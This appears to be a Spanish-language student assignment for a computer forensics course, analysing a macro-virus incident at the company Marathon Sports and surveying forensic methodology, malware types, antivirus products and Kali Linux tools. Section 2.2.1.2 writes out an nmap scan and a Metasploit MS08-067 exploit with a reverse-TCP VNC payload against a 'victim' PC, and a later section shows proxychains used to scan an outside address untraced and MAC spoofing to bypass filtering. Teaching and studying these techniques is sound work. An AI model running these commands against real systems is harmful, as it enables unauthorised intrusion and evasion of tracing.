Carrera: Tecnología en Gestión de Sistemas de la Información.

Nombre: Eddy Leonardo Larrea Criollo

Materia: Informática Forense

Actividad Nº2
Tema Propuesto:
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA
LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN
MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION.
Contenido
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA LOGÍSTICA DE RECEPCIÓN DE
EMBARQUES A CAUSA DE UN MALWARE QUE AFECTO A LA BASE DE DATOS E
INFORMACION. ............................................................................................................................. 3
1. METODOLOGÍA DE LA INFORMÁTICA FORENSE ................................................ 3
1.1. Delitos Informáticos ..................................................................................................... 3
1.2. Tipos de Incidentes ....................................................................................................... 3
1.3. Evidencia Digital ........................................................................................................... 4
1.4. ¿Qué significa la evidencia? ......................................................................................... 4
1.5. Análisis Forense Informático ........................................................................................ 4
1.5.1. Adquisición de Datos: ........................................................................................... 4
1.5.2. Análisis de Investigación: ..................................................................................... 5
1.5.3. Redacción del Informe:......................................................................................... 5
1.5.3.1. Informe ejecutivo: ............................................................................................ 5
1.5.3.2. Informe Técnico: ............................................................................................... 6
2. TÉCNICAS DE LA INFORMÁTICA FORENSE .......................................................... 6
2.2. Programa: ..................................................................................................................... 6
2.2.1. Técnicas de Hacking: ............................................................................................. 6
2.2.1.1. Descripción: ...................................................................................................... 6
2.2.1.2. Ejemplo con Xploits (explotar vulnerabilidades de Windows): ...................... 6
2.2.2. Herramientas usadas por los Atacantes: ............................................................. 7
2.2.3. Análisis: ................................................................................................................. 7
2.2.4. Herramientas para los administradores: ............................................................. 7
3. DESCRIPCION DEL MALWARE QUE AFECTO A LA BASE DE DATOS E
INFORMACION 7
3.1. Malware: ....................................................................................................................... 7
3.2. Tipos de Malware: ........................................................................................................ 8
4. MEDIOS POR DONDE INGRESA EL MALWARE ................................................. 10
5. VULNERABILIDADES DE LA RED ........................................................................ 15
5.1. TIPOS DE INTRUSO...................................................................................................... 16
6. METODOLOGIA DE LA NIST` ............................................................................. 17
7. TECNICAS DE SOFTWARE PARA UN ANALISIS FORENSE .................................. 17
8. ANTIVIRUS ......................................................................................................... 17
8.1. Cómo Funcionan?: ...................................................................................................... 18
8.2. Tipos de Antivirus: ...................................................................................................... 18
9. SOFTWARE UTILIZADO KALI LINUX .................................................................. 19
 9.1. Que es Software?: ...................................................................................................... 19
9.2. Software Kali Linux: .................................................................................................... 19
9.3. Distribuciones y herramientas que incluye Kali Linux: ............................................. 20
9.4. Herramientas necesarias para tareas específicas. .................................................... 20
9.5. Uso de Herramienta NBTSCAN:.................................................................................. 23

Ilustración 1: Fases de un Análisis Forense ................................................................................... 4

Ilustración 2: Tipos de Malware .................................................................................................... 8
Ilustración 3: Triangulo de la Intrusión ....................................................................................... 16
Ilustración 4: Herramientas utilizadas para un Análisis Forense ................................................ 17
Ilustración 5: Kali Linux Security .................................................................................................. 19

LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA

LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN
MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION.
Exposición de lo suscitado:

El jueves 8 y Viernes 9 de Febrero del 2018 la Empresa Marathon Sports presentó un incidente
en la logística de recepción de Embarques, ya que aquellos Contenedores que llegaron al Centro
de Distribución no tenían fechas asignadas y autorización de arribo como a su vez la información
respectiva para el descargue, causando malestar a las Empresas de las Marcas Mayoristas
(MEDEPORT: ADIDAS, EQUINOX: NIKE) por la demora de procesos en su mercadería.

El motivo por falta de información es a causa de un malware alojado en el Computador que

causo la infección en los archivos de información y base de datos ocasionando efectos molestos,
destructivos e incluso irreparables sin el consentimiento y/o del usuario.

1. METODOLOGÍA DE LA INFORMÁTICA FORENSE

1.1. Delitos Informáticos

Son actos criminales en los cuales se encuentran involucrados las computadoras:

- Delitos directamente contra computadoras

- Delitos donde la computadora contiene evidencia
- Delitos donde la computadora es utilizada para cometer el crimen

1.2. Tipos de Incidentes

 Robo de Propiedad intelectual

 Fraude
 Distribución de Virus
  Denegación de servicios
 Extorsión
 Estafa
 Acceso no autorizado
 Robo de Servicios
 Abuso de Privilegios

El análisis forense informático se aplica una vez que tenemos un incidente y queremos investigar
qué fue los que pasó, quien fue y como fue.

1.3. Evidencia Digital

La evidencia computacional es única, cuando se la compara con otras formas de “evidencia

documental”.

A diferencia de la documentación en papel, la evidencia computacional es frágil y una copia de

un documento almacenado en un archivo es idéntica al original.

Otro aspecto único de la evidencia computacional es potencial de realizar copias no autorizadas

de archivos, sin dejar rastro de que se realizó una copia.

1.4. ¿Qué significa la evidencia?

Requiere tener un conocimiento general profundo.

 Como la evidencia es creada.

 Se puede falsificar.
 Qué información se puede obtener.
 Qué puede estar mal.

CASO log UNIX wtmp – Acceso de usuarios.

CASO DHCP – Asignacion de Direcciones.

1.5. Análisis Forense Informático

“Es la técnica de capturar, procesar, e investigar información procedente de sistemas

informáticos utilizando una metodología con el fin de que pueda ser utilizada en la justicia”.
Rodney McKennish, report, “1998 Donald Mackay Churchill Fellowship to Study Overseas Developments in Forensic Computing” (Australia)

La informática forense se encarga de analizar sistemas informáticos en busca de evidencia que

colabore a llevar adelante una causa judicial o una negociación extrajudicial.

Ilustración 1: Fases de un Análisis Forense

1.5.1. Adquisición de Datos:

La adquisición de datos es una de las actividades más críticas en el análisis forense.
Dicha criticidad es debida a que, si se realizase mal, todo el análisis e investigación
posterior no sería válido debido a que la información saldría con impurezas, es
decir, la información que creemos que es del origen no lo es realmente.
 Una vez que se ha detectado un incidente de seguridad, uno de los primeros
problemas del analista en la recogida de datos se resume en decir si el equipo hay
que apagarlo o no.

1.5.2. Análisis de Investigación:

La fase de análisis e investigación de las evidencias digitales es un proceso que

requiere obviamente un gran conocimiento de los sistemas a estudiar. Las fuentes
de recogida de información en esta fase son varias:

o Registros de los sistemas Analizados.

o Registro de los detectores de intrusión.
o Registro de los cortafuegos.
o Ficheros del sistema analizado.

En el caso de los ficheros del sistema analizado, hay que tener cuidado con las
carpetas personales de los usuarios. Dichas carpetas están ubicadas en el directorio
/home en sistemas GNU/Linux y en c:\documents and settings\ en sistemas
Windows con tecnología NT (Windows 2000, XP, etc.).

Hay que tener en cuenta que no se consideran personales aquellas carpetas que
han sido creadas por defecto en la instalación del sistema operativo, por ejemplo,
las cuentas de administrador. De todas formas, siempre es recomendable
asesorarse con un jurista ante la realización de un análisis forense para prevenir
posibles situaciones desagradables (por ejemplo: ser nosotros los denunciados por
incumplir la legislación).

1.5.3. Redacción del Informe:

La redacción del informe es una tarea ardua a la par que compleja, porque no sólo
hay que recoger todas las evidencias, indicios y pruebas recabados sino que,
además, hay que explicarlos de una manera clara y sencilla. Hay que tener n cuenta
que muchas veces dichos informes van a ser leídos por personas sin conocimientos
técnicos y obviamente tiene que ser igual de riguroso y debe ser entendido, con lo
que habrá que explicar minuciosamente cada punto.

Todo informe deberá tener perfectamente identificada la fecha de finalización de

éste, así como a las personas involucradas en su desarrollo.

Aunque a continuación explicaremos los dos tipos de informes que hemos

mencionado anteriormente (informe ejecutivo e informe técnico) en ciertas
situaciones se pueden unificar en uno dependiendo del caso y de la situación,
aunque no es recomendable.

1.5.3.1. Informe ejecutivo:

Los principales lectores de los informes ejecutivos son la alta dirección de las
empresas, organismos, etc.; es decir, personas que no tienen un perfil técnico.

Por tanto, el lenguaje del informe no debe ser muy técnico y, si se utiliza alguna
jerga técnica, tiene que ser explicada de una manera clara.
 o Introducción: se describe el objeto del informe así como el coste del incidente
acaecido.
o Descripción: se detalla que ha pasado en el sistema de una manera clara y
concisa sin entrar en cuestiones muy técnicas. Hay que pensar que dicho
informe será leído por personal sin conocimientos técnicos o con muy escasos
conocimientos.
o Recomendaciones: se describen las acciones que se deben realizar una vez
comprobado que se ha sufrido una incidencia para evitar otra incidencia del
mismo tipo, así como si debe ser denunciado.

1.5.3.2. Informe Técnico:

En este tipo de informe sus principales lectores son personas con un perfil
técnico (ingenieros, técnicos superiores, etc.), siendo el objetivo del informe
describir qué ha ocurrido en el sistema. El informe debe contener al menos los
siguientes puntos:

o Introducción: donde se describe el objeto principal del informe y se detallan los

puntos fundamentales en que se disecciona el informe.
o Preparación del entorno y recogida de datos: se describen los pasos a seguir
para la preparación del entorno forense, la adquisición y verificación de las
imágenes del equipo afectado, etc.
o Estudio forense de las evidencias: en este punto se describe la obtención de las
evidencias así como de su significado.
o Conclusiones: donde se describen de una manera detallada las conclusiones a
las que se han llegado después de haber realizado el análisis.

2. TÉCNICAS DE LA INFORMÁTICA FORENSE

2.1. Objetivos: Conocer las técnicas que utilizan los atacantes y sus herramientas,
aprender a buscar evidencias y signos de intrusión.
 ORIENTADO A: Técnicos de seguridad, sistemas y redes.
 REQUISITOS: Conocimientos de seguridad informática.

2.2. Programa:
2.2.1. Técnicas de Hacking:
o Vulnerabilidades, búsqueda, análisis y explotación.
o Herramientas de seguridad.
2.2.1.1. Descripción:

Son Técnicas y procedimientos utilizados por un “Hacker” para un

determinado Objetivo, normalmente son procedimientos ilegales.

2.2.1.2. Ejemplo con Xploits (explotar vulnerabilidades de Windows):

Antes de lanzar cualquier exploit es recomendable que conozcamos las ip's

conectadas a nuestra red, para ello:

Linux:

Código:
 sudo nmap -sS -O 192.168.1.0-255
-sS --> Escaneamos de forma silenciosa
-O --> Para que nos muestre el Sistema Operativo

Windows:

o Código:

net view
Aparte de esto aconsejo también el uso de la herramienta Colasoft MAC
Scanner para el escaneo de pc's conectadas a la red.

Ejecutamos el msfconsole de Metasploit Framework.

Una vez que conocemos las ip's y sus respectivos Sistemas Operativos, para
utilizar el primer exploits vamos a intentar localizar algún Windows XP
(Recomendable que para ver si el pc está conectado hagamos ping a su ip)

Primer exploit (netapi)*

o Código:
use windows/smb/ms08_067_netapi
set RHOST (ip equipo remoto)
set payload windows/vncinject/reverse_tcp
set LHOST (ip equipo nuestro)
exploit Se nos abrirá una pantalla remota con el pc víctima.

2.2.2. Herramientas usadas por los Atacantes:

o Scanners y exploits.
o Rootkits.

2.2.3. Análisis:
o Cómo actuar ante un ataque.
o Notas legales.
o Análisis de huellas y localización de información en Windows y UNIX
o Análisis de logs.

2.2.4. Herramientas para los administradores:

o Herramientas de filtrado, alarmas en tiempo real y Honeypots.
o Buenas practicas, securización de entornos y parcheo.

3. DESCRIPCION DEL MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION

3.1. Malware:
El malware o software malicioso es un tipo de software que tiene como objetivo infiltrarse
o dañar un sistema de información sin el consentimiento de su propietario.
 El término se utiliza para hablar de todo tipo de amenazas informáticas o software hostil,
y existen distintos tipos de malware en función de su origen y consecuencias. Entre ellos
nos encontramos con los virus, gusanos, troyanos, keyloggers, botnets, spyware, adware,
ransomware y sacareware. (ilustración 1)

Ilustración 2: Tipos de Malware

3.2. Tipos de Malware:

 Virus Informático: Existen diferentes tipos de virus informáticos que pueden clasificarse
según su origen, las técnicas que utilizan, los tipos de archivo que infectan, dónde se
esconden, el tipo de daño que provocan, o el tipo de sistema operativo o plataforma
que atacan.
o Virus informáticos residentes de memoria.
o Virus de Acción Directa.
o Virus de Sobreescritura.
o Virus de sector de Arranque.
o Macro Virus.
o Virus Polimórfico.
o Virus Fat.
o Virus de secuencias de comando WEB.

Un virus informático es un sistema de software dañino, escrito intencionadamente para

entrar en una computadora sin permiso o conocimiento del usuario. Tiene la capacidad
de replicarse a sí mismo, continuando así su propagación. Algunos virus no hacen mucho
más que replicarse, mientras que otros pueden causar graves daños o afectar
negativamente el rendimiento de un sistema. Un virus nunca debe ser considerado
como inofensivo y dejarlo en un sistema sin tomar medidas.

 Gusano Informático: El gusano informático es otro de los tipos de malware más

comunes en la red, y su principal diferencia con los virus informáticos es que no necesita
la intervención del usuario ni la modificación de ningún archivo existente para infectar
un equipo. Por lo demás, tiene la característica de replicarse a sí mismo para expandirse
por las redes a las que está conectado un dispositivo.

Cuando consigue penetrar en un equipo, el gusano intenta obtener las direcciones de

otros ordenadores mediante tus listas de contactos para enviarles sus copias y tratar de
infectarlos también. No tienen por qué manipular ningún programa ni hacer que el
ordenador funcione incorrectamente, lo que los hace un poco más difíciles de detectar.

 Troyano: El troyano tiene algunas semejanzas con los virus informáticos, pero su
funcionamiento no es exactamente el mismo. Mientras que un virus suele ser
destructivo, un troyano trata de pasar desadvertido mientras accede a tu dispositivo con
la intención de ejecutar acciones ocultas con las que abrir una puerta trasera para que
otros programas maliciosos puedan acceder a él.
 Sin embargo, uno de los puntos en común entre varios tipos de malware es que los
troyanos también llegarán a ti disfrazados de archivos legítimos. Lo harán con
ejecutables que aparentemente no harán nada malo al ser utilizados, pero que
enseguida empezarán a trabajar a tus espaldas sin que te des cuenta.

 Spyware: Se trata de otro tipo de programa que se instala en tu equipo por sí sólo o
mediante la interacción de una segunda aplicación que lo lanza sin que te des
cuenta. Suelen trabajar a escondidas tratando de ocultar su rastro para que no levantes
la guardia y actúes con normalidad.

Su finalidad es la de recolectar información sobre el usuario u organización dueña de un

ordenador de forma no autorizada. De forma que no sean detectados, estos programas
monitorizan y recopilan datos sobre las acciones realizadas en un equipo, el contenido
del disco duro, las aplicaciones instaladas o todo lo que hacen en Internet. También
pueden llegar a instalar otras aplicaciones.

 Adware: El adware es un tipo de programa bastante polémico y difícil de catalogar.

Algunos lo consideran una clase de spyware, mientras que otros aseguran que ni
siquiera puede ser considerado un malware porque su intención final no es la de
dañar los ordenadores principales.

Su única misión es la de meterse en tu ordenador y empezar a mostrarte publicidad, ya

sea mientras estás navegando por internet, a forma de popup en momentos aleatorios
o durante la ejecución de un programa. Los hay incluso que se limitan a sustituir la
publicidad de una web por otra propia con la que sus creadores pueden obtener
beneficios.

Por lo general, este tipo de software suele instalarse en programas que después se
difunden gratuitamente como una fuente de ingresos para sus creadores. La razón por
la que algunas personas los consideran spyware, es porque algunos de ellos pueden
recolectar y enviar tus datos personales.

 Ransomware: Ransom quiere decir rescate en inglés, y de hecho lo que hace

es secuestrar los datos de un ordenador y pedir un rescate económico a cambio de
liberarlo. Normalmente lo que hace es cifrar tus datos, y lo que te ofrecen a cambio del
rescate económico es la clave para poder descifrarlos.

Este tipo de programas puede acceder a tu ordenador a lomos de un gusano informático

u otro tipo de malware, y una vez cifre tus datos bloqueará tu ordenador mostrándote
una pantalla de advertencia en la que se te informa que has sido víctima del ataque. En
esa pantalla se te muestra también la cantidad a pagar y el método de pago, que puede
ser por SMS, Paypal o mediante bitcoins.

Se trata de una de las amenazas que más está creciendo en los últimos años, por lo que
es importante tener tu ordenador siempre actualizado y seguir una serie de
precauciones a la hora de enfrentarte a correos electrónicos o mensajes sospechosos,
evitando siempre instalar nada que te manden por correo personas que no conozcas.

 Keylogger: Un keylogger (derivado del inglés: key ('tecla') y logger ('registrador');

'registrador de teclas') es un tipo de software o un dispositivo hardware específico que
se encarga de registrar las pulsaciones que se realizan en el teclado, para
posteriormente memorizarlas en un fichero o enviarlas a través de internet.
  Botnet: La palabra botnet se forma con los términos ingleses "robot" y "network" (red).
Los cibercriminales usan virus troyanos especiales para vulnerar la seguridad de las
computadoras de varios usuarios, tomar el control de cada computadora y organizar
todas las máquinas infectadas en una red de "bots" que el delincuente puede
administrar de manera remota.

A menudo, el cibercriminal busca infectar y controlar miles, decenas de miles o incluso

millones de computadoras para poder actuar como el amo de una gran "red zombi" (o
"red de bots") que es capaz de orquestar un ataque de denegación de servicio
distribuida (DDoS), una campaña de spam a gran escala u otros tipos de ciberataques.

Exposición de los archivos que afecto el Malware en la EMPRESA MARATHON SPORTS:

El miércoles 7 de Febrero del 2018 a las 17:30 el malware se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.

Archivos afectados:

- Base de datos (archivo Excel macros) contenía las Fechas, Empresa, Nombres de Embarques,
Línea del producto, Cantidades, Distribuciones, Numero de Orden y documentación extra para
proceder con la asignación y autorización de llegada al CD.

- Información necesaria para realización de Listados de recepción (archivos excel), el cual

contenía el Nombre de la Empresa, Fecha de Arribo, Número de Orden del sistema, detalles de
Items internacionales, detalle de Códigos JDE, Descripciones, Cantidades, distribuciones por
Almacenes y las Observaciones respectivas como eventos o promociones.

4. MEDIOS POR DONDE INGRESA EL MALWARE

 Aceptar las solicitudes que se presentan en anuncios o ventanas emergentes y que indican
que tu ordenador está infectado o que necesita un antivirus único. Este tipo de
indicaciones suelen aparecer al instalar o actualizar un tercer programa, y se sugiere que
si instalas algo desde Internet, debe ser de manera personalizada para asegurar que no
se agregue ningún virus o programa malicioso durante el proceso.

 Asegúrate de descargar el software que necesites para tí o para tu negocio desde una
fuente confiable y ejecútalo

 mediante los escaneos de antivirus correspondientes y con el spyware adecuado. Lee

todas las indicaciones sobre el programa que estás instalando y si es necesario, puedes
verificar si un sitio web es fiable utilizando herramientas como WOT.

 La apertura de archivos adjuntos de correo electrónico, como regla general, no debe

producirse con aquellos que no esperas recibir. Los equipos pueden infectarse cuando
los usuarios abren archivos adjuntos de correo electrónico que contienen códigos
 maliciosos. Aunque el mensaje sea de un compañero de trabajo, amigo o miembro de la
familia, ten cuidado antes de abrir un enlace o descargar un archivo adjunto que no
esperas.

 Cualquier Red abierta, disco duro, o memoria USB conectado al ordenador personal o de
empresa puede contener diferentes tipos de virus. Es una táctica común de los hackers
obtener acceso a una red mediante una serie de códigos presentes en una unidad
pendrive, y son capaces de infectar todo el sistema con un virus o un troyano.

 Visitando enlaces desconocidos corremos el peligro de acabar en un sitio web que podría
acceder a tu ordenador mediante archivos maliciosos u obtener todo tipo de información
sobre nuestro sistema. Abre con cuidado aquellos chats, correos electrónicos o SMS que
resulten sospechosos, ten cuidado incluso con las URL que parecen legítimas y
comprueba toda la información a la que hacen referencia.

 Ejecutar las actualizaciones más recientes también debe hacerse de forma razonable,
tratando con cautela especialmente aquellas asociadas a Microsoft Windows u
orientadas a la seguridad. Mantén siempre actualizado el sistema operativo, los
programas y los complementos de tu navegador que igualmente pueden ser vulnerables.
Ejecuta herramientas que sirvan para comprobar los complementos instalados y sus
versiones.

 El software pirata contenido en aplicaciones como BitTorrent para el intercambio ilegal de

música, películas o software protegido por derechos de autor, puede ser otro riesgo a
tener en cuenta. A veces estos archivos y programas contienen virus, spyware, troyanos
o software malicioso.

Detalle Gráfico del Malware que pudo haber ingresado al Computador (PC de LOGISTICA) de
la EMPRESA MARATHON SPORTS:

El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.

Archivos afectados:

- Base de datos (archivo Excel macros)

- Información necesaria para realización de Listados de recepción (archivos excel)

 En Packet Tracer observamos la Estructura de envió de archivos mediante TCP y IMCP

los mismos que se encuentran bloqueados por el FIREWALL, ya que era imposible él
envió y recepción de archivos.
- IMCP: El protocolo de mensajes de control de Internet (en inglés: Internet Control
Message Protocol y conocido por sus siglas ICMP) es el sub protocolo de control y
notificación de errores del Protocolo de Internet (IP). Como tal, se usa para enviar
mensajes de error, indicando por ejemplo que un router o host no puede ser localizado.
También puede ser utilizado para transmitir mensajes ICMP Query.
- TCP: (Transmission Control Protocol) Protocolo de Control de Transmisión.: Este
protocolo se encarga de crear “conexiones” entre sí para que se cree un flujo de datos.
Este proceso garantiza que los datos sean entregados en destino sin errores y en el
mismo orden en el que salieron. También se utiliza para distinguir diferentes
aplicaciones en un mismo dispositivo.
- El antivirus ESET NOD32 instalados en el Área de Logística estaba actualizados y cumplía con
las normativas respectivas.
 Los Puertos USB o medios extraíbles estaban bloqueados por seguridad.

CONCLUSION: El Malware que ingreso al Computador de Procesos de Logística pudo ser

introducido por algún intruso que labora dentro de la Empresa, ya que las seguridades
estaban cumpliendo con las normativas.

 En Este Grafico podemos Observar que el FIREWALL fue deshabilitado e ingresaron el

Malware para causar daños a la información.
Exposición del efecto que causo el VIRUS MACRO en la EMPRESA MARATHON SPORTS:

El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.

Consecuencias del Virus Macro:

El Virus Macro afecto a los archivos antes mencionados ocasionando en el CD lo siguiente:

Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y
autorizar la llegada de los Embarques.

El Área de Transferencias tuvo pérdida de tiempo en recursos, ya que el personal estaba

esperando dicha información para proceder con el descargue, separación de categorías, líneas,
colocación de precios/tickets, repartición del producto, transferencias a los Almacenes
(guardado - conteo) y carga a los Camiones para su respectivo envió.

El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y
sobrantes si existiesen.

El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras
que no se encuentren infectadas del virus macro.

5. VULNERABILIDADES DE LA RED

En seguridad informática, la palabra vulnerabilidad hace referencia a una debilidad en un

sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control
de acceso y consistencia del sistema o de sus datos y aplicaciones.

El análisis de la vulnerabilidad, a veces llamado exploración de la vulnerabilidad, es el acto de

determinar qué agujeros y vulnerabilidades de la seguridad pueden ser aplicables a la red de la
blanco. Para hacer esto, examinamos las máquinas identificadas dentro de la red de la blanco
para identificar todos los puertos abiertos y los sistemas operativos y los usos que los anfitriones
están funcionando (número de versión incluyendo, nivel del remiendo, y paquete del servicio).
Además, comparamos esta información con varias bases de datos de la vulnerabilidad del
Internet para comprobar qué vulnerabilidades y hazañas actuales pueden ser aplicables a la red
de la blanco.

La evaluación de vulnerabilidades es un factor clave en la seguridad de la información en una

compañía. Día a día se encuentran vulnerabilidades en diferentes Sistemas Operativos, Sistemas
o Aplicaciones informáticas, Programa de correo electrónico, entre otros.

5.1. TIPOS DE INTRUSO

o Hackers: Se trata de intrusos que se dedican a esto como pasatiempo y reto
técnico. Normalmente no suelen causar daños al sistema, pero pueden acceder
a datos confidenciales. Son personas con grandes conocimientos en lenguajes
de programación y sistemas, invierten mucho tiempo al día en esto.

o Crackers: Su objetivo es atacar sistemas informáticos de forma ilegal con algún

beneficio o para provocar algún daño a la propiedad del sistema, ya sea por
intereses políticos, religiosos, etc…

o Sniffers: Intrusos que se dedican a rastrear y descifrar mensajes que circulan

por una red.

o Phreakers: Intrusos especializados en sabotear y descifrar redes telefónicas

para poder realizar llamadas telefónicas gratuitas.

o Spammer: Son los artífices del envío de miles de mensajes de correo electrónico
no solicitado mediante redes como puede ser internet, provocando una
sobrecarga en los servidores de correo y colapso en los buzones de correo.

o Amenazas del Personal Interno: Este tipo de ataques los realiza el propio
personal de la organización o red, mediante accesos a ciertas partes de la red
con propósitos de curiosidad pero con el riesgo de poder alterar datos en caso
de acceso consumado. Hay que tener en cuenta también a los exempleados

Ilustración 3: Triangulo de la Intrusión

6. METODOLOGIA DE LA NIST`

El NIST fue fundado en 1901 como una agencia federal que forma parte del Departamento de
Comercio de los Estados Unidos. Su misión es elaborar y promover patrones de la medición, los
estándares y la tecnología con el fin de crear productividad, facilitar el comercio y mejorar la
calidad de vida.

Este instituto lleva a cabo un proyecto para el testeo de herramientas de análisis forense de
ordenadores (computer forensic tool testing, CFTT).

Su principal objetivo es la certificación de herramientas de hardware y software con el fin de

asegurar que su uso ofrece resultados fiables.

7. TECNICAS DE SOFTWARE PARA UN ANALISIS FORENSE

Existe actualmente en el mercado, una amplia diversidad de productos software para forense
digital. Algunas son herramientas genéricas las cuales proporcionan una variedad de funciones.
Otras son más enfocadas en servir a un propósito más limitado. Estas aplicaciones tienden a
enfocarse en un tipo muy específico de evidencia, por ejemplo correo electrónico o Internet.

Cuando se selecciona software, la elección necesita ser hecha entre ir con herramientas open
source o productos comerciales. Existen ventajas y desventajas en ambos. Factores como el
costo, funcionalidad, capacidades, y soporte son algunos de los criterios a ser utilizados para
hacer esta decisión

A continuación se muestran algunas de las herramientas que se utilizan en un análisis forense.

Ilustración 4: Herramientas utilizadas para un Análisis Forense

8. ANTIVIRUS

Los antivirus son programas cuyo objetivo es detectar o eliminar virus informáticos. Con el
transcurso del tiempo, la aparición de sistemas operativos más avanzados e internet, los
antivirus han evolucionado hacia programas más avanzados que además de buscar y detectar
virus informáticos consiguen bloquearlos, desinfectar archivos y prevenir una infección de los
mismos. Actualmente son capaces de reconocer otros tipos de malware como spyware,
gusanos, troyanos, rootkits, etc.

8.1. Cómo Funcionan?:

Normalmente, los antivirus monitorizan actividades de virus en tiempo real y hacen

verificaciones periódicas, o de acuerdo con la solicitud del usuario, buscando detectar
y, entonces, anular o remover los virus de la computadora.

Los antivirus actuales cuentan con vacunas específicas para decenas de miles de plagas
virtuales conocidas, y gracias al modo con que monitorizan el sistema consiguen
detectar y eliminar los virus, worms y trojans antes que ellos infecten el sistema.

Esos programas identifican los virus a partir de “firmas”, patrones identificables en

archivos y comportamientos del ordenador o alteraciones no autorizadas en
determinados archivos y áreas del sistema o disco rígido.

El antivirus debe ser actualizado frecuentemente, pues con tantos códigos maliciosos
siendo descubiertos todos los días, los productos pueden hacerse obsoletos
rápidamente. Algunos antivirus pueden ser configurados para que se actualicen
automáticamente. En este caso, es aconsejable que esta opción esté habilitada.

8.2. Tipos de Antivirus:

 Norton Internet Security: Es el mejor para la seguridad al navegar por internet. Una de
sus principales características es la detección de 'malware', la cual se basa en el análisis
de su comportamiento como una amenaza.

 Kaspersky Internet Security: Provee de una adecuada seguridad a los usuarios mientras
se encuentran conectados y desconectados de internet. Tiene un gran desempeño en la
detección de 'malware'.

 AVG Internet Security: Es muy confiable en términos de detección de virus y su

desinfección. No es muy costoso pero su punto débil es su complicada interface que
complica su uso.

 PC Tool Internet Security: A pesar de que se han hecho muchas mejoras a través de los
años, aún tiene deficiencias. Carece de términos de control para padres y de una opción
de ayuda en línea.

 BitDefender Internet Security: Provee de una fuerte protección a sus usuarios. A pesar
de su alta capacidad para identificar y eliminar amenazas, aún sigue dejando rastros en
su trabajo, lo cual le resta efectividad.

 Alwil Avast Internet Security: Posee muy buenas funciones para la seguridad en
internet. Su capacidad disminuye al momento de detectar nuevas amenazas. No
contiene algunas funciones vitales.
  McAfee Internet Security: Tiene gráficos únicos y actualizados que lo hacen mejor que
los demás. Es intuitivo pero la desventaja frente al resto es que vuelve más lento el
desempeño del sistema.

 Panda Internet Security: Provee de todas las funciones básicas de seguridad. Es muy
seguro con los dispositivos USB conectados a la PC y nos da la posibilidad de tener 2Gb
de backup en línea.

 Webroot Internet Security: El antivirus viene equipado con un paquete de antispyware,

firewall y antispam. Para los usuarios más frecuentes, este software falla en las
funciones del control parental.

 Trend Micro Internet Security: Está totalmente equipado con seguridad para el
escritorio de la PC. La desventaja está en el precio y en su pobre desempeño al momento
de detectar 'malware'.

9. SOFTWARE UTILIZADO KALI LINUX

9.1. Que es Software?:

Es una palabra que proviene del idioma inglés, pero que gracias a la masificación de
uso, ha sido aceptada por la Real Academia Española. Según la RAE, el software es
un conjunto de programas, instrucciones y reglas informáticas que permiten ejecutar
distintas tareas en una computadora.

9.2. Software Kali Linux:

Kali Linux es la versión mejorada y renovada de la distro BackTrack, creada por
Offensive Segurity. La distro se basa en Debian, mientras que Backtrack se fijó en
Ubuntu para la creación de su programación.

Su principal objetivo es poner a disposición del usuario, las mejores herramientas para
trabajar la auditoría en internet y contar con un potente sistema de
seguridad informática ante los peligros que puedan existir.

Ilustración 5: Kali Linux Security

 9.3. Distribuciones y herramientas que incluye Kali Linux:

Una ventaja que proporciona el GNU/Linux a tu pc, es que te permite adaptarlo para conseguir
las herramientas necesarias adaptadas a las tareas específicas que queremos realizar. Partiendo
de las aplicaciones o software más generalista (como un navegador web o un visor de imágenes)
podemos ir personalizando el sistema con las aplicaciones que necesitemos para realizar
auditorías informáticas, pentest o tests de intrusión como (Zenmap, Nmao, Oswap ZAP,
Armitage,Aircrack-ng., etc).

De esta forma, en Linux encontrarás distros con opciones tan variadas como reproducir música,
visualizar archivos multimedia, o redactar documentos. Todas estas funciones estarán a tu
alcance, sin necesidad de descargar ningún software adicional en tu ordenador.

También existen distros especializadas según campos temáticos. Por ejemplo, en cuanto a la
seguridad informática, encontramos el programa Kali Linux que te ofrece distintas herramientas
para auditar tu sistema operativo y protegerle ante posibles ataques de hackers profesionales.

Sólo en este ámbito, podemos encontrar más de 300 aplicaciones que se encargan de velar por
la seguridad a través del sistema Kali Linux. Entre todas las que existen, cabe destacar Nmap que
controla los puertos de acceso a la red.

9.4. Herramientas necesarias para tareas específicas.

- MacChanger ( Cambia la dirección MAC): Cambiar la dirección física de nuestro
adaptador de red es una tarea sumamente útil en los test de penetración aquí la
explicación de cómo se utiliza ésta herramienta y para qué:

Podemos cambiar la dirección física de nuestro adaptador de red por ejemplo para
saltarnos el filtrado MAC de un router o dispositivo en concreto, posee multiples
opciones como crear direcciones random o elegir la MAC según la marca que fabricó el
dispositivo, entre algunas otras.

- ProxyChains: ProxyChains es una herrmienta que te permite establecer un proxy para

cada acción o comando que vayas a realizar, permitiéndote navegar a traves de uno o
varios proxies y así evitando ser rastreado en internet.
 Por ejemplo si quisiera lanzar un análisis Nmap sobre un equipo en concreto pero no
quiero conectarme desde mi dirección IP directamente utilizaría el comando
proxychains de la siguiente forma:

~$ proxychains nmap 74.125.68.101 -v -T4

Sin embargo, cabe destacar que para utilizarlo debemos configurar previamente algunos
parámetros en su archivo de configuración, como la dirección del proxy o proxies que
queremos utilizar.

- Traceroute: Es una herramienta de diagnóstico de red capaz de mostrar la ruta completa

de una conexión, así como medir los retrasos de tránsito de los paquetes enviados a
través de una red IP.

- Nmap: Network Mapper o Nmap es una herramienta utilizada para la detección de

redes y las auditorias de seguridad. Una de las opciones mas potentes de las muchas
que tiene, es el modificador: “ - script vuln” que hace que NMap escanee y audite la
seguridad de todos los puertos abiertos con la herramienta NSE.

Por ejemplo:

